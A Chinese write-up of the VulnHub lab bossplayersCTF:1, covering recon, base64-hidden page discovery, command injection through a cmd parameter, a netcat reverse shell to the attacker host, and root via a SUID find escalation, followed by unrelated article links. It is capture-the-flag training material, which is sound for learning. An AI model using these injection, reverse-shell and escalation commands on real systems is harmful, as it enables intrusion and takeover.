bossplayersCTF: 1 靶场渗透

靶场:bossplayersCTF: 1 bossplayersCTF: 1 ~ VulnHubicon-default.png?t=O83Ahttps://www.vulnhub.com/entry/bossplayersctf-1,375/

攻击机:kali-linux-2024

第一部分:信息收集

1,将两台虚拟机网络连接都改为NAT模式,并查看靶机的MAC地址

2,攻击机上做主机扫描发现靶机

arp-scan -l

靶机IP地址192.168.23.136,攻击机IP地址192.168.23.128

22/tcp open  ssh     OpenSSH 7.9p1 Debian 10

80/tcp open  http    Apache httpd 2.4.38

3,扫描靶机端口服务

nmap -sS -sV -n -T4 -p- 192.168.23.136

或者使用nmap的漏洞扫描脚本

nmap --script=vuln 192.168.23.136 -o vuln

4,访问80端口开启的服务查看做信息收集

bossplayers CTF - 由 Cuong Nguyen 创建

难度级别: [* ] [ ] [ ] [ ] [ ] [ ]

描述: 你好!我为那些想要弄湿脚的人创建的非常简单的 CTF。有一个方法论,避免 rabit 漏洞!我希望你喜欢这个,最重要的是,请玩得开心!

网站: sudocuong.com

5,dirb扫描该网站爆破出后台网页

存在/robots.txt泄露敏感信息,访问一下得到字符串,一眼丁真为base64编码

bG9sIHRyeSBoYXJkZXIgYnJvCg==

解码得到:lol try harder bro

访问nmap扫描得到的网页/logs.php看看

还是在网站初始页面/index.html的源码发现东西

第一次base64解码得到:ZDI5eWEybHVaMmx1Y0hKdlozSmxjM011Y0dod0NnPT0K

第二次base64解码得到:d29ya2luZ2lucHJvZ3Jlc3MucGhwCg==

第三次base64解码得到:workinginprogress.php

第二部分:漏洞挖掘

6,访问这个我们通过不断解码得到的网页

当前系统安装和任务状态

已安装的软件包

根据您提供的信息,以下是当前系统中已安装的软件包:

  • Linux Debian
  • Apache2
  • PHP

待办事项

以下是当前待办事项的状态:

尚未完成

  • Test ping command: 未完成
  • Fix Privilege Escalation: 未完成

已完成

  • Say Hi to Haley: 已完成

建议的操作

根据当前的任务状态,建议您按以下步骤操作:

  1. 测试ping命令
    • 打开终端
    • 输入ping <目标IP或域名>来测试网络连通性
    • 检查输出结果,确认命令执行正常
  2. 修复特权 escalation
    • 检查系统日志和审计记录,寻找潜在的特权 escalation漏洞
    • 更新所有已安装的软件包到最新版本
    • 确认所有系统用户只有其所需的最低权限
    • 对系统进行安全扫描,查找并修复任何发现的漏洞

通过提示尝试一下ping命令

/workinginprogress.php?cmd=ping%20-c%203%20127.0.0.1

原来存在命令注入漏洞,可以利用起来

命令注入漏洞概述

命令注入是一种安全漏洞,攻击者可以通过该漏洞在受害者的系统上执行任意操作系统命令。这种漏洞通常出现在Web应用程序中,当应用程序将用户输入的数据直接传递给系统命令解释器时,如果没有对输入数据进行适当的验证和过滤,就可能导致命令注入。命令注入漏洞的信息:

  1. Commix工具:Commix是一款用于检测和利用命令注入漏洞的工具,适用于Web开发者、渗透测试人员及安全研究者。它可以帮助检测Web应用中的命令注入攻击相关漏洞,并且在Kali Linux中自带有这款工具1
  2. 命令注入漏洞的利用:通过命令注入漏洞,攻击者可以执行诸如获取当前用户、反弹Shell等操作。利用命令注入漏洞的过程包括识别漏洞、构造恶意命令以及接收返回的Shell等2
  3. 漏洞扫描工具:Nikto和OWASP ZAP是两款常用的Web应用安全扫描工具,可以帮助发现Web应用中的各种安全漏洞,包括命令注入漏洞3

7,查看当前路径 ?cmd=pwd

查看当前目录下有什么文件 ?cmd=ls

查看服务器此时权限 ?cmd=id

第三部分:漏洞利用

8,既然这个web网站会直接执行我从url输入的命令,那么就可以通过反弹shell获得它的控制权

?cmd=nc -e /bin/bash 192.168.23.128 1234

9,在第8步的同时开启端口监听 nc -lvvp 1234

通过python脚本获取直观shell

python -c 'import pty;pty.spawn("/bin/bash")'

10,查看权限id,whoami

查看内核信息uname -a

第四部分:提权

11,查看是否能够sudo提权

该用户并没有能够sudo提权利用的地方

12,查看有没有suid提权利用点

find / -perm -4000 -type f 2>/dev/null

  1. find /: 在根目录/下进行查找。
  2. -perm -4000: 查找权限中包含SUID(Set User ID)位设置的文件。-4000表示查找具有SUID权限的文件。
  3. -type f: 只查找文件类型为普通文件(非目录、设备文件等)的文件。
  4. 2>/dev/null: 将命令执行过程中产生的标准错误输出重定向到/dev/null,即忽略错误输出。

13,尝试利用find提权

find . -exec /bin/bash -p \;

1,find .:

  • find 是一个用于在文件系统中查找文件的命令。
  • . 表示从当前目录开始查找。

2,-exec /bin/bash -p \;:

  • -exec 是 find 命令的一个选项,用于对每个找到的文件执行指定的命令。
  • /bin/bash -p 是要执行的命令。
    • /bin/bash 是Bash shell的路径。
    • -p 是Bash的一个选项,表示以特权模式启动shell。这个选项会尝试保留用户的有效用户ID(EUID)和组ID(EGID),即使它们与实际用户ID(UID)和组ID(GID)不同。
  • \; 是 -exec 选项的结束符,表示命令的结束。

提权利用成功,成功变成root用户,得到flag:congratulations

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.xdnf.cn/news/8524.html

如若内容造成侵权/违法违规/事实不符,请联系一条长河网进行投诉反馈,一经查实,立即删除!

相关文章

【linux学习指南】磁盘分区挂载到目录,形成文件系统挂载点

文章目录 &#x1f4dd;前言&#x1f320; 查看系统分区&#x1f309;制作一个大的磁盘块&#xff0c;就当做一个分区&#x1f309;格式化写入文件系统&#x1f309;将分区挂载到指定的目录&#x1f309;在分区重创建文件&#x1f309;卸载分区&#x1f309;分区挂载到目录才能…

STM32CUBEIDE FreeRTOS操作教程(八):queues多队列

STM32CUBEIDE FreeRTOS操作教程&#xff08;八&#xff09;&#xff1a;queues多队列 STM32CUBE开发环境集成了STM32 HAL库进行FreeRTOS配置和开发的组件&#xff0c;不需要用户自己进行FreeRTOS的移植。这里介绍最简化的用户操作类应用教程。以STM32F401RCT6开发板为例&#…

redis 原理篇 25 网络模型 信号驱动IO 及 异步IO

剩下这两种&#xff0c;用得少&#xff0c;快速过一下&#xff0c; 说啥队列太小&#xff0c;这个不是问题&#xff0c;搞个持久化&#xff0c; 说啥队列元素太频繁导致开销大&#xff0c;这个也没问题&#xff0c;搞成批量入队&#xff0c;减少频率&#xff0c;增大吞吐量&am…

某事业单位转型公益二类后岗位梳理项目纪实

某事业单位转型公益二类后岗位梳理项目纪实 ——公益一类事业单位转型二类后&#xff0c;如何优化岗位配置&#xff0c;梳理岗位职责 【客户行业】事业单位 【问题类型】岗位梳理 【客户背景】 某地公证机构于20世纪90年代经批准设立&#xff0c;是该市司法局直属国家公证…

DNS域名解析服务器--RHCE

1.DNS简介 DNS &#xff08; Domain Name System &#xff09;是互联网上的一项服务&#xff0c;它作为将域名和 IP 地址相互映射的一个分布式 数据库&#xff0c;能够使人更方便的访问互联网 DNS 系统使用的是网络的查询&#xff0c;那么自然需要有监听的 port 。 DNS 使用的是…

Linux案例:DNS服务器配置

Linux案例&#xff1a;DNS服务器配置 实验一&#xff1a;正向解析 服务端配置&#xff1a; [rootserver ~]# setenforce 0 [rootserver ~]# nmcli c modify ens160 ipv4.method manual ipv4.addresses 192.168.70.131/24 ipv4.gateway 192.168.70.2 ipv4.dns 114.114.114.11…

京东创作平台旋转验证码识别

昨天京东创作平台验证码又更新了&#xff0c;变成了这种旋转验证码。经过我们一天的努力&#xff0c;终于完成了这款验证码的数据标记&#xff0c;模型训练。现在正确率达到了几乎100%。 识别代码 只需要获取图片链接&#xff0c;下载图片得到原图&#xff0c;使用下面代码就可…

Spring DispatcherServlet详解

文章目录 Spring DispatcherServlet详解一、引言二、DispatcherServlet的初始化与工作流程1、DispatcherServlet的初始化1.1、加载配置和建立WebApplicationContext1.2、初始化策略 2、DispatcherServlet的工作流程2.1、请求分发2.2、代码示例 三、总结 Spring DispatcherServl…

Ubuntu 安装CUDA, cuDNN, TensorRT(草稿)

文章目录 写在前面一、CUDA, cuDNN, TensorRT 三个库的版本的确定二、解决方法参考链接 写在前面 自己的测试环境&#xff1a; Ubuntu20.04, 本文安装的版本&#xff1a; cuda_11.1.0&#xff1b;cuDNN-8.2.1&#xff1b;TensorRT-8.2.4.2 一、CUDA, cuDNN, TensorRT 三个库…

[GDKOI2024 普及组] 读书(线段树)

luogu 传送门https://www.luogu.com.cn/problem/P10077 解题思路 我们可以贪心地思考&#xff1a;每次寻找最小值&#xff0c;然后去阅读这一章。 直到阅读的章数达到 。 这样&#xff0c;你就可以写出一个 的暴力&#xff0c;拿 40 分。 但是&#xff0c;如果你并不满足于…

TCP/IP基础

TCP/IP的概念 TCP/IP是一个协议簇&#xff0c;包括多个协议 定义了计算机操作系统如何连入因特网&#xff0c;以及数据如何在他们之间传输的标准。 TCP/IP的分层结构 TCP/IP按照层次可以分成四层&#xff0c;应用层、传输层、网络层和数据链路层 应用层 包括虚拟终端协议…

数据迁移: 安全高效转移数据, 满足企业业务需求和技术改进

天津鸿萌科贸发展有限公司从事数据安全服务二十余年&#xff0c;致力于为各领域客户提供专业的数据存储、数据恢复、数据备份、数据迁移等解决方案与服务&#xff0c;并针对企业面临的数据安全风险&#xff0c;提供专业的相关数据安全培训。 鸿萌数据迁移业务为众多企业顺利高效…

可视化建模与UML《类图实验报告》

史铁生&#xff1a; 余华和莫言扛着我上火车&#xff0c; 推着走打雪仗&#xff0c; 还带我偷西瓜&#xff0c; 被人发现后他们拔腿就跑&#xff0c; 却忘了我还在西瓜地里。 一、实验目的&#xff1a; 1、熟悉类图的构件事物。 2、熟悉类之间的泛化、依赖、聚合和组合关系…

Zypher Network:全栈式 Web3 游戏引擎,服务器抽象叙事的引领者

近期&#xff0c;《黑神话&#xff1a;悟空》的爆火不仅让 AAA 游戏重回焦点&#xff0c;也引发了玩家与开发者的热议。Web2 游戏的持续成功导致部分 Web3 玩家们的倒戈&#xff0c;对比之下 Web3 游戏存在生命周期短且商业模式难以明确的问题&#xff0c;尤其在当前加密市场环…

C++11的简介

杀马特主页&#xff1a;羑悻的小杀马特.-CSDN博客 ------ ->欢迎阅读 欢迎阅读 欢迎阅读 欢迎阅读 <------- 目录 一列表初始化的变化&#xff1a; 二左右值即各自引用的概念&#xff1a; 2.1左右…

Java 上机实践3(分支与循环语句)

&#xff08;大家好&#xff0c;今天分享的是Java的相关知识&#xff0c;大家可以在评论区进行互动答疑哦~加油&#xff01;&#x1f495;&#xff09; 目录 实验一&#xff1a;回文数 一、实验目的 二、实验要求 三、程序代码 四、实验结果 实验二&#xff1a;猜数字…

[MRCTF2020]PYWebsite1

如果输入的密钥是对的那么我们就直接跳转到flag.php页面 那么我们直接访问&#x1f60e;&#xff0c;他不带我们去我们自己去. 那就用XFF呗. 知识点&#xff1a; 定义&#xff1a;X-Forwarded-For是一个HTTP请求头字段&#xff0c;用于识别通过HTTP代理或负载均衡方式连接到W…

实时离线融合计算的数据同步实践

实时批量融合计算时&#xff0c;一般需要批量将数据推送到hbase供实时使用。 本文将通过两个典型场景--累计场景与最新分区场景&#xff0c;讨论批量和实时衔接的设计方案&#xff0c;解决批量延迟可能导致的问题。 累计场景 在之前的文章中讲述了实时离线结合共同计算客户1…

怎么做自己公司的小程序

我是【码云数智】平台的黄导&#xff0c;今天分享&#xff1a;怎么做自己公司的小程序 企业小程序怎么制作&#xff0c;利用可视化小程序模板搭建&#xff0c;企业能够轻松跨越技术门槛&#xff0c;快速响应市场变化。 01、小程序制作流程 02、微信小程序开发多少钱 03、微…

外包干了5年,技术退步太明显了。。。。。

先说一下自己的情况&#xff0c;本科生生&#xff0c;19年通过校招进入杭州某软件公司&#xff0c;干了差不多五年的功能测试&#xff0c;感觉自己不能够在这样下去了&#xff0c;长时间呆在一个舒适的环境会让一个人堕落!而我已经在一个企业干了五年的功能测试&#xff0c;已经…